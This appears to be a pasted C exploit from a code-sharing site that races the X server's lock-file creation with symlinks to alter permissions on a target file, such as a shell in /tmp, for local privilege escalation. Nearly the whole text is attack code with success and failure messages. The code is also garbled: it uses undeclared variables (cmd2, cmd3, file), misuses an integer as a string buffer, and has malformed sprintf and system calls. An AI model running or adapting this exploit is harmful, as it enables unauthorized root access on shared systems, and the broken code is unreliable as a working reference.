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a guest
Jun 23rd, 2018
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  1. #include <sys/types.h>
  2. #include <sys/stat.h>
  3. #include <fcntl.h>
  4. #include <unistd.h>
  5. #include <stdio.h>
  6. #include <syscall.h>
  7. #include <signal.h>
  8. #include <string.h>
  9. #include <stdlib.h>
  11. #define XORG_BIN "/usr/bin/X"
  12. #define DISPLAY ":1"
  14. char *get_tty_number(void) {
  15. char tty_name[128], *ptr;
  16. memset(tty_name, '\0', sizeof(tty_name));
  17. readlink("/proc/self/fd/4", tty_name, sizeof(tty_name)); // this seems to always be free..
  18. if ((ptr = strstr(tty_name, "tty")))
  19. return ptr + 3;
  20. return NULL;
  21. }
  23. int launch_xorg_instance(void) {
  24. int child_pid;
  25. char *opt[] = { XORG_BIN, DISPLAY, NULL };
  26. if ((child_pid = fork()) == 0) {
  27. close(1);
  28. close(2);
  29. execve(XORG_BIN, opt, NULL);
  30. _exit(0);
  31. }
  32. return child_pid;
  33. }
  35. void show_target_file(char *file) {
  36. char cmd[524];
  37. memset(cmd, '\0', sizeof(cmd));
  38. sprintf(cmd, "ls -l %s", file);
  39. memset(cmd2, '\0', sizeof(cmd2));
  40. sprintf(cmd2, "su -", file);
  41. system(cmd);
  42. system(cmd2);
  43. system(cmd3);
  44. }
  46. int main(int argc, char **argv) {
  47. pid_t proc;
  48. struct stat st;
  49. int n, ret, vv, current_attempt = 800;
  50. char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
  51. if (argc < 2)
  52. strcpy(target_file, "/tmp/sh");
  53. else
  54. strcpy(target_file, argv[1]);
  55. sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
  56. sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
  57. if (stat(lockfile, &st) == 0) {
  58. return 1;
  59. }
  60. symlink("/dontexist", lockfile);
  61. memset(vv, '\0', sizeof(vv));
  62. sprintf(vv, "chmod 4755 %s", file);
  63. setuid(0);
  64. setgid(0); // backup - failover
  65. umask(077);
  66. ttyno = get_tty_number();
  67. while (--current_attempt) {
  68. proc = launch_xorg_instance();
  69. n = 0;
  70. while (n++ < 10000)
  71. if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
  72. break;
  73. if (ret == 0) {
  74. syscall(SYS_kill, proc, SIGSTOP);
  75. stat(lockfiletmp, &st);
  76. if ((st.st_mode & 4) == 0)
  77. break;
  78. launch_xorg_instance();
  79. sleep(2);
  80. }
  81. kill(proc, SIGKILL);
  82. }
  83. if (current_attempt == 0) {
  84. printf("[-] Attack failed!\n");
  85. if (!ttyno)
  86. printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
  87. return 1;
  88. }
  89. launch_xorg_instance();
  90. sleep(2);
  91. if (stat(lockfiletmp, &st) == 0) {
  92. return 1;
  93. }
  94. printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
  95. symlink(target_file, lockfiletmp);
  96. printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
  97. kill(proc, SIGCONT);
  98. usleep(30000);
  99. stat(target_file, &st);
  100. if (!(st.st_mode & 004)) {
  101. printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
  102. return 1;
  103. }
  104. unlink(lockfile);
  105. printf("[+] Attack worked: ls -l %s:\n", target_file);
  106. show_target_file(target_file);
  107. chdir("/tmp/sh"); // cd to our shell..
  108. return 0;
  109. }
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